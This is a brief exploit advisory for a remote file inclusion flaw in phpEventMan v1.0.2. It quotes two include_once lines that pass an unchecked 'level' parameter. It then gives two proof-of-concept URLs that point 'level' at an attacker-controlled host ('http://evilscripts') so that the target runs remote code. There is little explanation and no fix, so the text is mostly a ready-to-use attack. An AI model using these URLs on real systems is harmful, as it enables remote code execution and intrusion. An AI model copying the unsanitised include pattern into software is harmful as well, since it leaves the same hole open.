phpEventMan v1.0.2 (level) Remote File Include Exploit
Author: Cyber-Security
Code:
include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");
POC:
www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?
Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594